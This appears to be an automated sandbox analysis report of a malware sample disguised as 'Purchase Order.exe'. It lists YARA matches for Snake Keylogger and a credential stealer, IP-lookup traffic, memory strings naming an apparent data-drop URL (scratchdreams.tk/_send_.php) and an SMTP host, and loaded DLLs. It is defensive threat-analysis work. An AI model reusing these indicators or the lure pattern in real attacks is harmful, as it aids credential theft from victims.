Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.5:49710 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /_send_.php?TS HTTP/1.1Host: scratchdreams.tkConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown

DNS traffic detected: queries for: checkip.dyndns.org

Source: Purchase Order.exe, 00000004.00000002.4420689970.0000000003149000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.00000000030E4000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.00000000030FF000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.000000000310D000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.0000000003051000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.000000000313A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: Purchase Order.exe, 00000004.00000002.4420689970.0000000003045000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.0000000003149000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.0000000003094000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.00000000030E4000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.00000000030FF000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.000000000310D000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.000000000311B000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.0000000003051000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.000000000313A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: Purchase Order.exe, 00000004.00000002.4420689970.0000000002F91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: Purchase Order.exe, 00000000.00000002.2016558471.00000000038DE000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4418790694.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: Purchase Order.exe, 00000004.00000002.4420689970.0000000003149000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.00000000030E4000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.00000000030FF000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.0000000003069000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.000000000310D000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.000000000313A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.org
Source: Purchase Order.exe, 00000004.00000002.4420689970.0000000002F91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Purchase Order.exe, 00000004.00000002.4420689970.0000000003157000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://scratchdreams.tk
Source: Purchase Order.exe, 00000004.00000002.4420689970.0000000003262000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://us2.smtp.mailhostbox.com
Source: Purchase Order.exe, 00000004.00000002.4420689970.0000000003149000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.0000000003094000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.00000000030E4000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.00000000030FF000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.000000000310D000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.0000000003051000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.000000000313A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: Purchase Order.exe, 00000000.00000002.2016558471.00000000038DE000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4418790694.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.0000000003051000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: Purchase Order.exe, 00000004.00000002.4420689970.000000000313A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/102.129.152.231
Source: Purchase Order.exe, 00000004.00000002.4420689970.0000000003149000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.0000000003094000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.00000000030E4000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.00000000030FF000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.000000000310D000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.000000000313A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/102.129.152.231$
Source: Purchase Order.exe, 00000000.00000002.2016558471.00000000038DE000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4418790694.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.0000000003157000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://scratchdreams.tk
Source: Purchase Order.exe, 00000004.00000002.4420689970.0000000003157000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://scratchdreams.tk/_send_.php?TS

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723

Source: unknown

HTTPS traffic detected: 172.67.169.18:443 -> 192.168.2.5:49724 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.Purchase Order.exe.39cb798.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.Purchase Order.exe.39cb798.7.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.Purchase Order.exe.39cb798.7.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.Purchase Order.exe.39cb798.7.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.Purchase Order.exe.39aaf78.9.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.Purchase Order.exe.39aaf78.9.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.Purchase Order.exe.39aaf78.9.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.Purchase Order.exe.39aaf78.9.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 4.2.Purchase Order.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 4.2.Purchase Order.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 4.2.Purchase Order.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 4.2.Purchase Order.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.Purchase Order.exe.39cb798.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.Purchase Order.exe.39cb798.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.Purchase Order.exe.39cb798.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.Purchase Order.exe.39aaf78.9.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.Purchase Order.exe.39aaf78.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.Purchase Order.exe.39aaf78.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000004.00000002.4418790694.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000004.00000002.4418790694.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000000.00000002.2016558471.00000000038DE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.2016558471.00000000038DE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: Purchase Order.exe PID: 5304, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: Purchase Order.exe PID: 5304, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: Purchase Order.exe PID: 3304, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: Purchase Order.exe PID: 3304, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: Purchase Order.exe

Source: C:\Users\user\Desktop\Purchase Order.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 0_2_00C2D604	0_2_00C2D604
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 0_2_06D61680	0_2_06D61680
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 0_2_06D63598	0_2_06D63598
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 0_2_06D63588	0_2_06D63588
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 0_2_06D67D0C	0_2_06D67D0C
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 0_2_06D61AB8	0_2_06D61AB8
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 0_2_06D61248	0_2_06D61248
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 0_2_06D63160	0_2_06D63160
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4_2_01526168	4_2_01526168
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4_2_0152C1F0	4_2_0152C1F0
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4_2_0152B388	4_2_0152B388
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4_2_0152C4D0	4_2_0152C4D0
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4_2_01526790	4_2_01526790
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4_2_0152C7B2	4_2_0152C7B2
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4_2_015298B8	4_2_015298B8
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4_2_01524B31	4_2_01524B31
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4_2_0152FA10	4_2_0152FA10
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4_2_0152CA92	4_2_0152CA92
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4_2_0152EDF0	4_2_0152EDF0
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4_2_0152BF10	4_2_0152BF10
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4_2_015221A8	4_2_015221A8
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4_2_0152E310	4_2_0152E310
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4_2_0152E300	4_2_0152E300
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4_2_0152B552	4_2_0152B552
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4_2_015235CA	4_2_015235CA
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4_2_06CCB6E8	4_2_06CCB6E8
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4_2_06CCD670	4_2_06CCD670
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4_2_06CC8608	4_2_06CC8608
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4_2_06CC8C5B	4_2_06CC8C5B
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4_2_06CCA408	4_2_06CCA408
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4_2_06CCBD38	4_2_06CCBD38
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4_2_06CCAA58	4_2_06CCAA58
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4_2_06CCC388	4_2_06CCC388
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4_2_06CCB0A0	4_2_06CCB0A0
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4_2_06CC7050	4_2_06CC7050
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4_2_06CCD028	4_2_06CCD028
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4_2_06CCC9D8	4_2_06CCC9D8
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4_2_06CC11A0	4_2_06CC11A0
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4_2_06CC5EC8	4_2_06CC5EC8
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4_2_06CCB6E3	4_2_06CCB6E3
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4_2_06CC5EB8	4_2_06CC5EB8
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4_2_06CCD66B	4_2_06CCD66B
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4_2_06CC560A	4_2_06CC560A
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4_2_06CC5618	4_2_06CC5618
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4_2_06CC676A	4_2_06CC676A
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4_2_06CC6778	4_2_06CC6778
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4_2_06CC3730	4_2_06CC3730
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4_2_06CC0488	4_2_06CC0488
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4_2_06CC0498	4_2_06CC0498
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4_2_06CC7497	4_2_06CC7497
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4_2_06CC74A8	4_2_06CC74A8
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4_2_06CC4430	4_2_06CC4430
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4_2_06CC85F8	4_2_06CC85F8
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4_2_06CC0D48	4_2_06CC0D48
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4_2_06CC7D48	4_2_06CC7D48
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4_2_06CC7D58	4_2_06CC7D58
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4_2_06CC0D39	4_2_06CC0D39
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4_2_06CCBD36	4_2_06CCBD36
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4_2_06CCF2A0	4_2_06CCF2A0
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4_2_06CCAA4B	4_2_06CCAA4B
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4_2_06CC5A60	4_2_06CC5A60
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4_2_06CC5A70	4_2_06CC5A70
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4_2_06CCF273	4_2_06CCF273
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4_2_06CC6BC1	4_2_06CC6BC1
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4_2_06CC6BD0	4_2_06CC6BD0
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4_2_06CCA3FB	4_2_06CCA3FB
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4_2_06CCC386	4_2_06CCC386
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4_2_06CC33A8	4_2_06CC33A8
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4_2_06CC33B8	4_2_06CC33B8
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4_2_06CC6312	4_2_06CC6312
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4_2_06CC6320	4_2_06CC6320
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4_2_06CC08E0	4_2_06CC08E0
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4_2_06CC08F0	4_2_06CC08F0
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4_2_06CC78F0	4_2_06CC78F0
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4_2_06CCB09B	4_2_06CCB09B
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4_2_06CC0040	4_2_06CC0040
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4_2_06CC7040	4_2_06CC7040
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4_2_06CC0007	4_2_06CC0007
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4_2_06CC2807	4_2_06CC2807
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4_2_06CC2818	4_2_06CC2818
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4_2_06CCD026	4_2_06CCD026
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4_2_06CCC9D3	4_2_06CCC9D3
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4_2_06CC518A	4_2_06CC518A
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4_2_06CC5198	4_2_06CC5198
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4_2_06CC81A0	4_2_06CC81A0
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4_2_06CC81B0	4_2_06CC81B0
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4_2_06CC7900	4_2_06CC7900

Source: Purchase Order.exe, 00000000.00000002.2016558471.00000000038DE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs Purchase Order.exe
Source: Purchase Order.exe, 00000000.00000002.2016558471.00000000038DE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs Purchase Order.exe
Source: Purchase Order.exe, 00000000.00000002.2018087751.0000000006B30000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs Purchase Order.exe
Source: Purchase Order.exe, 00000000.00000000.1955472261.00000000002C8000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameEeBu.exe: vs Purchase Order.exe
Source: Purchase Order.exe, 00000000.00000002.2013482317.000000000098E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Purchase Order.exe
Source: Purchase Order.exe, 00000000.00000002.2016001178.000000000275B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs Purchase Order.exe
Source: Purchase Order.exe, 00000004.00000002.4419161581.0000000001278000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Purchase Order.exe
Source: Purchase Order.exe, 00000004.00000002.4418790694.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs Purchase Order.exe
Source: Purchase Order.exe, 00000004.00000002.4419016890.00000000010F7000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs Purchase Order.exe
Source: Purchase Order.exe	Binary or memory string: OriginalFilenameEeBu.exe: vs Purchase Order.exe

Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: winhttp.dll	Jump to behavior
